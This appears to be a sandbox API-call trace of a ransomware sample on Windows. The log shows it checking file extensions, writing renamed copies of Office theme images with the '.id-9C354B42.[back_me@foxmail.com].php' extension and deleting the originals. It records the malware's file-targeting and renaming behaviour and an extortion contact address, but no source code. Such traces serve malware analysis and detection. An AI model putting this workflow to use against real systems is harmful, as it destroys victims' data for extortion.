[0047.663] lstrlenW (lpString=".docx") returned 5 [0047.663] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.663] lstrlenW (lpString=".pdf") returned 4 [0047.663] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.663] lstrlenW (lpString=".xls") returned 4 [0047.663] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.663] lstrlenW (lpString=".xlsx") returned 5 [0047.663] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.663] lstrlenW (lpString=".ppt") returned 4 [0047.663] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.663] lstrlenW (lpString=".zip") returned 4 [0047.663] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.663] lstrlenW (lpString=".rar") returned 4 [0047.663] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.663] lstrlenW (lpString=".bz2") returned 4 [0047.663] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.663] lstrlenW (lpString=".7z") returned 3 [0047.663] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.663] lstrlenW (lpString=".dbf") returned 4 [0047.663] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.663] lstrlenW (lpString=".1cd") returned 4 [0047.663] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.663] lstrlenW (lpString=".jpg") returned 4 [0047.663] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.664] lstrlenW (lpString=".doc") returned 4 [0047.664] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.664] lstrlenW (lpString=".docx") returned 5 [0047.664] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.664] lstrlenW (lpString=".pdf") returned 4 [0047.664] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.664] lstrlenW (lpString=".xls") returned 4 [0047.664] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.664] lstrlenW (lpString=".xlsx") returned 5 [0047.664] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.664] lstrlenW (lpString=".ppt") returned 4 [0047.664] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.664] lstrlenW (lpString=".zip") returned 4 [0047.664] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.664] lstrlenW (lpString=".rar") returned 4 [0047.664] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.664] lstrlenW (lpString=".bz2") returned 4 [0047.664] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.664] lstrlenW (lpString=".7z") returned 3 [0047.664] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.664] lstrlenW (lpString=".dbf") returned 4 [0047.664] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.664] lstrlenW (lpString=".1cd") returned 4 [0047.664] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.664] lstrlenW (lpString=".jpg") returned 4 [0047.664] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.665] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.665] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.665] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2574) returned 1 [0047.665] CloseHandle (hObject=0x210) returned 1 [0047.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 0x20 [0047.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.665] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.665] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.668] GetLastError () returned 0x0 [0047.668] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xa0e, lpOverlapped=0x0) returned 1 [0047.669] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xa10, lpOverlapped=0x0) returned 1 [0047.670] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.670] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.670] SetEndOfFile (hFile=0x1f8) returned 1 [0047.670] CloseHandle (hObject=0x1f8) returned 1 [0047.670] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.670] SetEndOfFile (hFile=0x210) returned 1 [0047.671] CloseHandle (hObject=0x210) returned 1 [0047.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.671] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 1 [0047.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString=".doc") returned 4 [0047.672] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.672] lstrlenW (lpString=".docx") returned 5 [0047.672] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.672] lstrlenW (lpString=".pdf") returned 4 [0047.672] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.672] lstrlenW (lpString=".xls") returned 4 [0047.672] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.672] lstrlenW (lpString=".xlsx") returned 5 [0047.672] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.672] lstrlenW (lpString=".ppt") returned 4 [0047.672] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString=".zip") returned 4 [0047.672] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.672] lstrlenW (lpString=".rar") returned 4 [0047.672] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.672] lstrlenW (lpString=".bz2") returned 4 [0047.672] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.672] lstrlenW (lpString=".7z") returned 3 [0047.672] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString=".dbf") returned 4 [0047.672] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString=".1cd") returned 4 [0047.672] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString=".jpg") returned 4 [0047.672] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.672] lstrlenW (lpString=".doc") returned 4 [0047.673] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.673] lstrlenW (lpString=".docx") returned 5 [0047.673] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.673] lstrlenW (lpString=".pdf") returned 4 [0047.673] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.673] lstrlenW (lpString=".xls") returned 4 [0047.673] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.673] lstrlenW (lpString=".xlsx") returned 5 [0047.673] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.673] lstrlenW (lpString=".ppt") returned 4 [0047.673] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.673] lstrlenW (lpString=".zip") returned 4 [0047.673] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.673] lstrlenW (lpString=".rar") returned 4 [0047.673] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.673] lstrlenW (lpString=".bz2") returned 4 [0047.673] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.673] lstrlenW (lpString=".7z") returned 3 [0047.673] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.673] lstrlenW (lpString=".dbf") returned 4 [0047.673] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.673] lstrlenW (lpString=".1cd") returned 4 [0047.673] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.673] lstrlenW (lpString=".jpg") returned 4 [0047.673] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.673] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.674] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.674] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=37440) returned 1 [0047.674] CloseHandle (hObject=0x210) returned 1 [0047.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 0x20 [0047.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.674] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.674] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.675] GetLastError () returned 0x0 [0047.675] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x9240, lpOverlapped=0x0) returned 1 [0047.836] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x9250, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x9250, lpOverlapped=0x0) returned 1 [0047.837] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.837] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.838] SetEndOfFile (hFile=0x1f8) returned 1 [0047.838] CloseHandle (hObject=0x1f8) returned 1 [0047.838] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.838] SetEndOfFile (hFile=0x210) returned 1 [0047.839] CloseHandle (hObject=0x210) returned 1 [0047.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.839] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1 [0047.839] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.839] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.839] lstrlenW (lpString=".doc") returned 4 [0047.839] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.839] lstrlenW (lpString=".docx") returned 5 [0047.839] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.839] lstrlenW (lpString=".pdf") returned 4 [0047.839] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString=".xls") returned 4 [0047.840] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.840] lstrlenW (lpString=".xlsx") returned 5 [0047.840] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.840] lstrlenW (lpString=".ppt") returned 4 [0047.840] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.840] lstrlenW (lpString=".zip") returned 4 [0047.840] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.840] lstrlenW (lpString=".rar") returned 4 [0047.840] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.840] lstrlenW (lpString=".bz2") returned 4 [0047.840] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString=".7z") returned 3 [0047.840] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.840] lstrlenW (lpString=".dbf") returned 4 [0047.840] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.840] lstrlenW (lpString=".1cd") returned 4 [0047.840] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.840] lstrlenW (lpString=".jpg") returned 4 [0047.840] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.840] lstrlenW (lpString=".doc") returned 4 [0047.840] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString=".docx") returned 5 [0047.840] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.840] lstrlenW (lpString=".pdf") returned 4 [0047.840] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.840] lstrlenW (lpString=".xls") returned 4 [0047.841] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.841] lstrlenW (lpString=".xlsx") returned 5 [0047.841] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.841] lstrlenW (lpString=".ppt") returned 4 [0047.841] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.841] lstrlenW (lpString=".zip") returned 4 [0047.841] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.841] lstrlenW (lpString=".rar") returned 4 [0047.841] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.841] lstrlenW (lpString=".bz2") returned 4 [0047.841] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.841] lstrlenW (lpString=".7z") returned 3 [0047.841] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.841] lstrlenW (lpString=".dbf") returned 4 [0047.841] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.841] lstrlenW (lpString=".1cd") returned 4 [0047.841] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.841] lstrlenW (lpString=".jpg") returned 4 [0047.841] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.841] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.841] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.842] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1339) returned 1 [0047.842] CloseHandle (hObject=0x210) returned 1 [0047.842] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 0x20 [0047.842] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.842] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.842] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.925] GetLastError () returned 0x0 [0047.925] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x53b, lpOverlapped=0x0) returned 1 [0048.015] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x540, lpOverlapped=0x0) returned 1 [0048.016] ReadFile (in: hFile=0x210, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.016] WriteFile (in: hFile=0x1f8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.016] SetEndOfFile (hFile=0x1f8) returned 1 [0048.016] CloseHandle (hObject=0x1f8) returned 1 [0048.016] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.017] SetEndOfFile (hFile=0x210) returned 1 [0048.017] CloseHandle (hObject=0x210) returned 1 [0048.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.018] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 1 [0048.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0048.018] lstrlenW (lpString=".doc") returned 4 [0048.018] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 